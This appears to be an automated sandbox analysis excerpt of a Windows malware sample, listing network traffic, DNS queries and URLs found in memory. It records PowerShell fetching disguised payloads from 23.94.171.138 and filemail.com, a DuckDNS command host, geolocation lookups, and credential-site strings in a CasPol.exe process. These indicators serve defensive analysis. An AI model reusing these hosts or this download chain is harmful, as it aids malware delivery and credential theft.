                    Source: unknownTCP traffic detected without corresponding DNS query: 23.94.171.138
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.94.171.138
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.94.171.138
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.94.171.138
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.94.171.138
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.94.171.138
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.94.171.138
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.94.171.138
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.94.171.138
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.94.171.138
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.94.171.138
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.94.171.138
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.94.171.138
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.94.171.138
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.94.171.138
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.94.171.138
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.94.171.138
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.94.171.138
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.94.171.138
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.94.171.138
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.94.171.138
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.94.171.138
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.94.171.138
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.94.171.138
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.94.171.138
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.94.171.138
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.94.171.138
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.94.171.138
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.94.171.138
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.94.171.138
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.94.171.138
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.94.171.138
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.94.171.138
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.94.171.138
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.94.171.138
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_03104BB0 URLDownloadToFileW,1_2_03104BB0
                    Source: global trafficHTTP traffic detected: GET /api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f HTTP/1.1Host: 1017.filemail.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /edgeoffer/pb/experiments?appId=edge-extensions&country=CH HTTP/1.1Host: api.edgeoffer.microsoft.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                    Source: global trafficHTTP traffic detected: GET /crx/blobs/AW50ZFuKxXfmS97pgdN117JdnzteDOW0nOxXPbIMSOJi_zMXlj_Y84pRZgGX1_WSw7i6yKhrqpdS319KewJbpE_4ZxBd62lsUferdiEuq7Yg9JR92C5gtrLldrMl4JgnY0IAxlKa5RR9kAwB758lMbnQOIDqR06lx1aH/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_83_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                    Source: global trafficHTTP traffic detected: GET /329/createthebestthingswithgoodthingsbestforgreatthingsformeevengood.tIF HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 23.94.171.138Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /329/FRSSDE.txt HTTP/1.1Host: 23.94.171.138Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                    Source: CasPol.exeString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
                    Source: CasPol.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
                    Source: global trafficDNS traffic detected: DNS query: 1017.filemail.com
                    Source: global trafficDNS traffic detected: DNS query: 15.164.165.52.in-addr.arpa
                    Source: global trafficDNS traffic detected: DNS query: nextnewupdationsforu.duckdns.org
                    Source: global trafficDNS traffic detected: DNS query: geoplugin.net
                    Source: global trafficDNS traffic detected: DNS query: ntp.msn.com
                    Source: global trafficDNS traffic detected: DNS query: bzib.nelreports.net
                    Source: global trafficDNS traffic detected: DNS query: clients2.googleusercontent.com
                    Source: global trafficDNS traffic detected: DNS query: sb.scorecardresearch.com
                    Source: global trafficDNS traffic detected: DNS query: assets.msn.com
                    Source: global trafficDNS traffic detected: DNS query: c.msn.com
                    Source: global trafficDNS traffic detected: DNS query: api.msn.com
                    Source: powershell.exe, 00000001.00000002.1588165227.00000000031DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.94.171.138/
                    Source: powershell.exe, 00000001.00000002.1589019492.0000000004CB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://23.94.171.138/329/createt
                    Source: powershell.exe, 00000001.00000002.1589019492.0000000004CB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://23.94.171.138/329/createthebestthingswithgoodthingsbestforgreatthingsformeevengood.tIF
                    Source: powershell.exe, 00000001.00000002.1588165227.00000000031DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.94.171.138/329/createthebestthingswithgoodthingsbestforgreatthingsformeevengood.tIF5
                    Source: powershell.exe, 00000001.00000002.1600493692.0000000007707000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.94.171.138/329/createthebestthingswithgoodthingsbestforgreatthingsformeevengood.tIFLMEM
                    Source: powershell.exe, 00000001.00000002.1588165227.0000000003286000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1920551053.0000000007460000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
                    Source: powershell.exe, 00000003.00000002.1480842016.0000000007465000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microso
                    Source: chrome.exe, 00000010.00000003.2129587008.0000372000A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2194089145.0000372002004000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://dns-tunnel-check.googlezip.net/connect2
                    Source: CasPol.exe, CasPol.exe, 0000000C.00000002.3863782930.0000000000F98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
                    Source: powershell.exe, 0000000A.00000002.1870823401.0000000005C9A000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
                    Source: powershell.exe, 00000003.00000002.1476840604.000000000510D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.micros
                    Source: powershell.exe, 00000001.00000002.1597053881.0000000005AE9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1478768021.0000000005DB9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1870823401.0000000005C9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                    Source: powershell.exe, 0000000A.00000002.1870823401.0000000004D88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                    Source: powershell.exe, 00000003.00000002.1476840604.0000000004EA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                    Source: powershell.exe, 00000001.00000002.1589019492.0000000004A81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1476840604.0000000004D51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2380307874.0000000004E57000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1870823401.0000000004C31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: powershell.exe, 00000003.00000002.1476840604.0000000004EA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                    Source: chrome.exe, 00000010.00000003.2129587008.0000372000A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2194089145.0000372002004000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tls-tunnel-check.googlezip.net/connect2
                    Source: powershell.exe, 0000000A.00000002.1870823401.0000000004D88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                    Source: CasPol.exeString found in binary or memory: http://www.ebuddy.com
                    Source: CasPol.exeString found in binary or memory: http://www.imvu.com
                    Source: powershell.exe, 00000003.00000002.1480842016.0000000007465000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.c
                    Source: CasPol.exeString found in binary or memory: http://www.nirsoft.net/
                    Source: powershell.exe, 0000000A.00000002.1870823401.0000000004D88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://1017.filemail.com
                    Source: powershell.exe, 0000000A.00000002.1870823401.0000000004D88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6S
                    Source: powershell.exe, 00000003.00000002.1475637134.0000000002DA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aka..FT_
                    Source: powershell.exe, 00000001.00000002.1589019492.0000000004A81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1476840604.0000000004D51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2380307874.0000000004E89000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2380307874.0000000004E7A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1870823401.0000000004C31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                    Source: powershell.exe, 00000003.00000002.1476840604.0000000004EA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
                    Source: chrome.exe, 00000010.00000003.2129587008.0000372000A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2194089145.0000372002004000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromecontentsuggestions-pa.googleapis.com/v1/suggestions/fetch2
                    Source: chrome.exe, 00000010.00000003.2129587008.0000372000A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2194089145.0000372002004000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromefeedcontentsuggestions-pa.googleapis.com/v2/suggestions/fetch26
                    Source: chrome.exe, 00000010.00000003.2129587008.0000372000A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2194089145.0000372002004000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromefeedcontentsuggestions-pa.googleapis.com/v2/suggestions/fetchb
                    Source: chrome.exe, 00000010.00000003.2173678555.00003720016BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymity-pa.googleapis.com/
                    Source: chrome.exe, 00000010.00000003.2129587008.0000372000A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2194089145.0000372002004000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymity-pa.googleapis.com/2%
                    Source: chrome.exe, 00000010.00000003.2173678555.00003720016BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/
                    Source: chrome.exe, 00000010.00000003.2129587008.0000372000A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2194089145.0000372002004000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/2$
                    Source: chrome.exe, 00000010.00000003.2174000389.00003720016D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2171916329.0000372001634000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2173814868.00003720016C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2163456123.0000372001540000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2173541412.00003720016B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2174745448.00003720016FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2172416237.0000372001648000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2174303481.00003720016F4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2172600956.0000372001650000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2172805524.0000372001654000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2163283126.0000372001524000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2174077403.00003720016E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2174226836.00003720016E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2173678555.00003720016BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/
                    Source: chrome.exe, 00000010.00000003.2129587008.0000372000A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2194089145.0000372002004000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/2O
                    Source: chrome.exe, 00000010.00000003.2129587008.0000372000A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2194089145.0000372002004000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromeupboarding-pa.googleapis.com2
                    Source: chrome.exe, 00000010.00000003.2129587008.0000372000A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2194089145.0000372002004000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromeupboarding-pa.googleapis.com2P
                    Source: chrome.exe, 00000010.00000002.2189386045.000001FB6FA08000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2121760597.00003FE8002E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2121681801.00003FE8002D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/cr/report
                    Source: chrome.exe, 00000010.00000003.2129587008.0000372000A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2194089145.0000372002004000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://content-autofill.googleapis.com/b-
                    Source: powershell.exe, 0000000A.00000002.1870823401.0000000005C9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                    Source: powershell.exe, 0000000A.00000002.1870823401.0000000005C9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                    Source: powershell.exe, 0000000A.00000002.1870823401.0000000005C9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                    Source: chrome.exe, 00000010.00000003.2129587008.0000372000A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2194089145.0000372002004000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cuscochromeextension-pa.googleapis.com/v_turned_down_returns_404/omniboxsuggestionsb
                    Source: powershell.exe, 0000000A.00000002.1870823401.0000000004D88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                    Source: chrome.exe, 00000010.00000003.2173678555.00003720016BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/
                    Source: chrome.exe, 00000010.00000003.2129587008.0000372000A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2194089145.0000372002004000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/2J
                    Source: chrome.exe, 00000010.00000003.2171916329.0000372001634000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/Enabled_Notice_MPArch_M1_S_Delay_GA4Kids_20230926_An
                    Source: chrome.exe, 00000010.00000003.2174000389.00003720016D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2173814868.00003720016C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2173541412.00003720016B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2174303481.00003720016F4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2174077403.00003720016E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2174226836.00003720016E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2173678555.00003720016BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/Enabled_Notice_MPArch_M1_XS_Delay_GA4Kids_20230926
                    Source: chrome.exe, 00000010.00000003.2173678555.00003720016BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/Wk
                    Source: chrome.exe, 00000010.00000003.2172805524.0000372001654000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/cl
                    Source: chrome.exe, 00000010.00000003.2174000389.00003720016D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2173814868.00003720016C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2163456123.0000372001540000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2173541412.00003720016B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2172416237.0000372001648000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2163283126.0000372001524000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2173678555.00003720016BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/https://google-ohttp-relay-join.fastly-edge.com/
                    Source: chrome.exe, 00000010.00000003.2174000389.00003720016D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/https://google-ohttp-relay-join.fastly-edge.com/Vs
                    Source: chrome.exe, 00000010.00000003.2174000389.00003720016D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2171916329.0000372001634000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2173814868.00003720016C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2163456123.0000372001540000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2173541412.00003720016B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2174745448.00003720016FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2172416237.0000372001648000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2174303481.00003720016F4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2172600956.0000372001650000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2172805524.0000372001654000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2163283126.0000372001524000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2174077403.00003720016E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2174226836.00003720016E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2173678555.00003720016BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/
                    Source: chrome.exe, 00000010.00000003.2129587008.0000372000A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2194089145.0000372002004000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/2P
                    Source: chrome.exe, 00000010.00000003.2171916329.0000372001634000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2172416237.0000372001648000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2172600956.0000372001650000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2172805524.0000372001654000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/7
                    Source: chrome.exe, 00000010.00000003.2173541412.00003720016B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2173678555.00003720016BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/BiddingAndScoringDebugReportingAPIKAnonymityService
                    Source: chrome.exe, 00000010.00000003.2174000389.00003720016D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2173814868.00003720016C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2173541412.00003720016B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2173678555.00003720016BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://chromekanonymityquery-pa.googleapis.com/
                    Source: chrome.exe, 00000010.00000003.2173678555.00003720016BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://chromekanonymityquery-pa.googleapis.com/Con
                    Source: chrome.exe, 00000010.00000003.2173678555.00003720016BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://chromekanonymityquery-pa.googleapis.com/Ena
                    Source: chrome.exe, 00000010.00000003.2173678555.00003720016BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://chromekanonymityquery-pa.googleapis.com/htt
                    Source: chrome.exe, 00000010.00000003.2174000389.00003720016D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2173814868.00003720016C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2174745448.00003720016FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2174303481.00003720016F4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2174077403.00003720016E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2174226836.00003720016E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/ndScoringDebugReportingAPI7
                    Source: chrome.exe, 00000010.00000003.2129587008.0000372000A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2194089145.0000372002004000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/b
                    Source: chrome.exe, 00000010.00000003.2129587008.0000372000A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2194089145.0000372002004000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/bJ
                    Source: chrome.exe, 00000010.00000003.2129587008.0000372000A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2194089145.0000372002004000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://googleusercontent.comb
                    Source: chrome.exe, 00000010.00000003.2151458786.0000372001028000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2
                    Source: chrome.exe, 00000010.00000003.2151458786.0000372001028000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboard
                    Source: chrome.exe, 00000010.00000003.2129587008.0000372000A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2194089145.0000372002004000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboard2
                    Source: chrome.exe, 00000010.00000003.2151458786.0000372001028000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboard7
                    Source: chrome.exe, 00000010.00000003.2129587008.0000372000A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2194089145.0000372002004000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboardb
                    Source: chrome.exe, 00000010.00000002.2194089145.0000372002004000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiments
                    Source: chrome.exe, 00000010.00000003.2129587008.0000372000A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2194089145.0000372002004000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/v3/2
                    Source: chrome.exe, 00000010.00000002.2194089145.0000372002004000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/v3/upload2
                    Source: powershell.exe, 00000001.00000002.1600493692.000000000771C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
                    Source: CasPol.exeString found in binary or memory: https://login.yahoo.com/config/login
                    Source: chrome.exe, 00000010.00000003.2129369509.00003720013C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nonexistent.googlezip.net/
                    Source: chrome.exe, 00000010.00000003.2129369509.00003720013C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nonexistent.googlezip.net/OfflinePagesPrefetchingForcedOn_OfflinePagesPrefetchingOfflinePage
                    Source: chrome.exe, 00000010.00000003.2129587008.0000372000A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2194089145.0000372002004000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nonexistent.googlezip.net/b
                    Source: powershell.exe, 00000001.00000002.1597053881.0000000005AE9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1478768021.0000000005DB9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1870823401.0000000005C9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                    Source: chrome.exe, 00000010.00000003.2129587008.0000372000A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2194089145.0000372002004000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shieldedids-pa.googleapis.com2#
                    Source: chrome.exe, 00000010.00000003.2129587008.0000372000A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2194089145.0000372002004000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=blockedb
                    Source: chrome.exe, 00000010.00000003.2129587008.0000372000A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2194089145.0000372002004000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tunnel-staging.googlezip.net/2
                    Source: CasPol.exeString found in binary or memory: https://www.google.com
                    Source: chrome.exe, 00000010.00000003.2129587008.0000372000A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2194089145.0000372002004000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/2(
                    Source: CasPol.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
                    Source: chrome.exe, 00000010.00000003.2129587008.0000372000A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2194089145.0000372002004000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/b
                    Source: chrome.exe, 00000010.00000003.2129587008.0000372000A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2194089145.0000372002004000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chromesuggestionsJ
